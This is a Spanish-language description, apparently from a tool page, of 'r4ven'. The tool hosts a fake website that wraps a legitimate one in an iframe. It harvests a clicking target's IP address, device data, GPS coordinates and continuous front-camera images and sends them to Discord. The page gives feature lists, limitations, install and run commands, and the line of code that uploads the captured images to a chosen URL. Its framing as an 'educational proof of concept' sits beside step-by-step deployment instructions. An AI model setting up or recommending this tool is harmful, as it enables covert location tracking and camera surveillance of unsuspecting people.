La herramienta aloja un sitio web falso que utiliza un iframe para mostrar un sitio web legítimo y, si el objetivo lo permite, obtendrá la ubicación GPS (latitud y longitud) del objetivo, capturará múltiples imágenes del objetivo junto con la dirección IP y la información del dispositivo.
Esta herramienta es una prueba de concepto y es sólo para fines educativos.
Usando esta herramienta, puedes averiguar qué información puede recopilar un sitio web malicioso sobre ti y tus dispositivos y por qué no deberías hacer clic en enlaces aleatorios o concederles permisos como el de Localización.
Características Principales
- Seguimiento de la dirección IP y la ubicación geográfica
- Recopilación de información del sistema del dispositivo
- Captura de imágenes de la cámara del dispositivo
- Integración con Discord para la presentación de datos
- Interacción del usuario para el permiso de localización
- Visualización de un sitio web a través de un iframe incrustado
- Recopilación periódica de datos basada en intervalos
- Acceso y carga de imágenes de la cámara web
- Formato y presentación de datos en mensajes de Discord
- Enlaces a Google Maps y Google Earth basados en la ubicación
- Gestión de errores en caso de denegación de permisos de localización
- Comentarios de los usuarios y mensajes de error
En el enlace si se hace clic:
- Obtendrá automáticamente la dirección IP y la información del dispositivo.
- Si el permiso de localización está permitido, obtendrá la localización exacta del objetivo.
- Si se permite el permiso de cámara, capturará sin parar desde la cámara frontal.
Limitaciones
- Asegúrate de que el puerto de reenvío de lo contrario no funcionará en el navegador del teléfono inteligente
- La mayoría de los navegadores bloquean automáticamente los permisos adicionales para URL basadas en IP.
- No funcionará en los ordenadores portátiles o teléfonos que no tienen GPS o sin cámara,
- navegadores que bloquean javascript,
- o si el objetivo está burlando la ubicación GPS.
- o si el objetivo está usando VPN o IP falsa.
- Algunos navegadores bloquean automáticamente el permiso de localización como (Brave, Safari, etc)
- Funciona mejor con el navegador Chrome
- La precisión de la ubicación será más precisa si se utiliza esto en un smartphone.
Localización IP VS. Localización GPS
- La localización geográfica basada en la dirección IP NO es exacta,
- No proporciona la ubicación del objetivo.
- En su lugar, proporciona la ubicación aproximada del ISP (proveedor de servicios de Internet).
- El GPS obtiene una localización casi exacta porque utiliza coordenadas de longitud y latitud.
- Una vez concedido el permiso de localización
- Se recibe información de localización exacta con una aproximación de 20 a 30 metros de la ubicación del usuario. (es casi la ubicación exacta)
Instalación
git clone https://github.com/spyboy-productions/r4ven.git
cd r4ven
pip3 install -r requirements.txt
python3 r4ven.py
NOTA: Si no vas a utilizar localhost (http://127.0.0.1:8000/image)
Modifica esta línea (archivo index.html
) con la URL que desees utilizar:
203. xhr.open('POST', 'http://127.0.0.1:8000/image', true);
O
Por favor, utiliza la bandera -t
para elegir una URL diferente.
Utiliza el siguiente comando para hacer r4ven ejecutable:
chmod +x r4ven.py
python3 r4ven.py [-t target] [-p port]
Ejemplo:
python3 r4ven.py -t https://replit.com/myproject/images -p 8080
https://github.com/spyboy-productions/r4ven